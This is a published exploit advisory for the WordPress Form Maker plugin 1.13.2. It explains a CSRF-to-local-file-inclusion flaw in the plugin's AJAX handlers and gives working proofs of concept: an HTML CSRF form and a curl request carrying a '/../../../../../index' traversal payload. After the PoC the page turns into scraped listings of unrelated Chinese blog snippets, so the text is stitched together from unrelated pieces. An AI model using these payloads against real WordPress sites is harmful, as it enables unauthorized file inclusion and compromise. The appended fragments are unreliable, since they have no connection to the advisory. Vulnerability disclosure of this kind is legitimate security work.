# Title: Form Maker by WD [CSRF → LFI]
# Date: 2019-03-17
# Exploit Author: Panagiotis Vagenas
# Vendor Homepage: http://web-dorado.com/
# Software Link: https://wordpress.org/plugins/form-maker
# Version: 1.13.2
# Tested on: WordPress 5.1

Description
-----------

Plugin implements the following AJAX actions:

- `generete_csv`
- `generete_xml`
- `formmakerwdcaptcha`
- `formmakerwdmathcaptcha`
- `product_option`
- `FormMakerEditCountryinPopup`
- `FormMakerMapEditinPopup`
- `FormMakerIpinfoinPopup`
- `show_matrix`
- `FormMakerSubmits`
- `FormMakerSQLMapping`
- `select_data_from_db`
- `manage_fm`
- `FMShortocde`

All of them call the function `form_maker_ajax`. This function
dynamicaly loads a file defined in `$_GET['action']` or
`$_POST['action']` if the former is not defined. Because of the way
WordPress defines the AJAX action a user could define the plugin action
in the `$_GET['action']` and AJAX action in `$_POST['action']`.
Leveraging that and the fact that no sanitization is performed on the
`$_GET['action']`, a malicious actor can perform a CSRF attack to load a
file using directory traversal thus leading to Local File Inclusion
vulnerability.

Plugin also registers the following AJAX actions:

- `paypal_info`
- `checkpaypal`

Those seems like the are only available to PRO version users, yet they
also are vulnerable to this attack.

Additionally the following AJAX actions are registered in PRO version:

- `get_frontend_stats`
- `frontend_show_map`
- `frontend_show_matrix`
- `frontend_paypal_info`
- `frontend_generate_csv`
- `frontend_generate_xml`

Those have the function `form_maker_ajax_frontend` as a callback. All of
them are vulnerable to the aforementioned attack. What's more
interesting about those is the fact that are available to non-registered
users also, making this attack directly exploitable, without using a
CSRF attack. In this case the vulnerable param is `$_REQUEST['page']`.

------

PoC
### Using a CSRF attack

```HTML

 <form method="post"

 action="http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php?action=/../../../../../index">

     <label>AJAX action:

         <select name="action">

             <optgroup label="Free version">

                <option value="generete_csv">generete_csv</option>

                <option value="generete_xml">generete_xml</option>

                <option value="formmakerwdcaptcha">formmakerwdcaptcha</option>

                <option value="formmakerwdmathcaptcha">formmakerwdmathcaptcha</option>

                 <option value="product_option">product_option</option>

                 <option value="FormMakerEditCountryinPopup">FormMakerEditCountryinPopup</option>

                 <option value="FormMakerMapEditinPopup">FormMakerMapEditinPopup</option>

                 <option value="FormMakerIpinfoinPopup">FormMakerIpinfoinPopup</option>

                 <option value="show_matrix">show_matrix</option>

                 <option value="FormMakerSubmits">FormMakerSubmits</option>

                 <option value="FormMakerSQLMapping">FormMakerSQLMapping</option>

                 <option value="select_data_from_db">select_data_from_db</option>

                 <option value="manage_fm">manage_fm</option>

                 <option value="FMShortocde">FMShortocde</option>

             </optgroup>

             <optgroup label="Pro Version">

                 <option value="paypal_info">paypal_info</option>

                 <option value="checkpaypal">checkpaypal</option>

                 <option value="get_frontend_stats">get_frontend_stats</option>

                 <option value="frontend_show_map">frontend_show_map</option>

                 <option value="frontend_show_matrix">frontend_show_matrix</option>

                 <option value="frontend_paypal_info">frontend_paypal_info</option>

                 <option value="frontend_generate_csv">frontend_generate_csv</option>

                 <option value="frontend_generate_xml">frontend_generate_xml</option>

             </optgroup>

         </select>

     </label>

     <button type="submit" value="Submit">Submit</button>

 </form>

```

### Without leveraging the CSRF vulnerability
```sh

curl 'http://wp-plugin-csrf.dev/wp-admin/admin-ajax.php'  -d 'action=get_frontend_stats&page=/../../../../../index'

```

WordPress Plugin Form Maker [CSRF → LFI] vulnerable 2019-03-17的更多相关文章

  1. WordPress Plugin Contact Form Builder [CSRF → LFI]

    # Exploit Title: Contact Form Builder [CSRF → LFI]# Date: 2019-03-17# Exploit Author: Panagiotis Vag ...

  2. WordPress plugin Contact Form [CSRF → LFI] vulnerable 2019-03-17

    # Exploit Title: Contact Form by WD [CSRF → LFI]# Date: 2019-03-17# Exploit Author: Panagiotis Vagen ...

  3. [2019/03/17#杭师大ACM]赛后总结(被吊锤记)

    前言 和扬子曰大佬和慕容宝宝大佬一组,我压力巨大,而且掌机,累死我了,敲了一个下午的代码,他们两个人因为比我巨就欺负我QwQ. 依旧被二中学军爆锤,我真的好菜,慕容宝宝或者是扬子曰大佬来掌机一定成绩比 ...

  4. article2pdf (Wordpress plug-in) Multiple vulnerabilities(CVE-2019-1000031, CVE-2019-1010257)

    Product: article2pdf (Wordpress plug-in)Product Website: https://wordpress.org/plugins/article2pdf/A ...

  5. Django之Form、CSRF、cookie和session

    Django是一个大而全的web框架,为我们提供了很多实用的功能,本文主要介绍Form.CSRF.cookie和session 一.Form 在web页面中form表单是重要的组成部分,为了数据安全和 ...

  6. Django的Form、CSRF、cookie和session

    Django是一个大而全的web框架,为我们提供了很多实用的功能,本文主要介绍Form.CSRF.cookie和session 一.Form 在web页面中form表单是重要的组成部分,为了数据安全和 ...

  7. WordPress Contact Form 7插件任意文件上传漏洞

    漏洞名称: WordPress Contact Form 7插件任意文件上传漏洞 CNNVD编号: CNNVD-201311-415 发布时间: 2013-11-28 更新时间: 2013-11-28 ...

  8. HTML form without CSRF protection,HTML表单没有CSRF保护

    HTML form without CSRF protection =HTML表单没有CSRF保护 CSRF是伪造客户端请求的一种攻击,CSRF的英文全称是Cross Site Request For ...

  9. [2019.03.25]Linux中的查找

    TMUX天下第一 全世界所有用CLI Linux的人都应该用TMUX,我爱它! ======================== 以下是正文 ======================== Linu ...

随机推荐

  1. logback日志框架的简单使用

    1.首先在maven中增加依赖 <dependency> <groupId>ch.qos.logback</groupId> <artifactId>l ...

  2. 安装mysql8.0.12

    安装mysql8.0.12 https://blog.csdn.net/zwj1030711290/article/details/80039780 问题1:忘记记录日志打印的密码就把窗口给关了 解决 ...

  3. 《Python神经网络编程》的读书笔记

    文章提纲 全书总评 读书笔记 C01.神经网络如何工作? C02.使用Python进行DIY C03.开拓思维 附录A.微积分简介 附录B.树莓派 全书总评 书本印刷质量:4星.纸张是米黄色,可以保护 ...

  4. android获取string.xml的值

    在android开发过程中,编写java代码中的常量过一般情况下,我们是定义在string.xml这个文件中.这样修改起来也很方便,而且做国际化也很简单. 这个string.xml的值会被R文件映射, ...

  5. 【算法】深度优先 马走日 Hamilton routes

    在n*m的棋盘中,马只能走“日” 字.马从位置(x,y)处出发,把棋盘的每一格都走一次,且只走一次.找出所有路径. ××××××××××××× 类似问题: 在半个中国象棋棋盘上,马在左下角(1,1)处 ...

  6. Android一些问题

    1.wait()与sleep() wait()方法会释放占有的对象锁,当前线程进入等待池,释放cpu, 而其他正在等待的线程即可抢占此锁,获得锁的线程即可运行程序: sleep()方法则表示,当前线程 ...

  7. Go语言里的slice

    1.切片是基于数组做的一层封装,灵活能够自动扩容. 2.切片的初始化方法 ①直接创建 ②基于已有的数组或切片 ③使用make来创建一个切片 第一个5是切片的大小 第二个5是切片的容量 3.基本操作 ① ...

  8. 修改CentOS6.5默认主机名(root下操作)

    使用CentOS6.5官方镜像安装完毕之后,默认的主机名为localhost,不便管理,我们需要根据实际情况修改. 此处我准备讲默认的主机名 localhost 改为 comex01-ct65 第一步 ...

  9. pwn-GUESS

    参考了其他wp之后才慢慢做出来的 记录一下 首先checksec一下 有canary 放到IDA看下源码 运行流程大概是 有三个fork 即三次输入机会,于是无法爆破cannary 本题用的是SSP ...

  10. (十三)事件分发器——event()函数,事件过滤

    事件分发器——event()函数 事件过滤 事件进入窗口之前被拦截 eventFilter #include "mywidget.h" #include "ui_mywi ...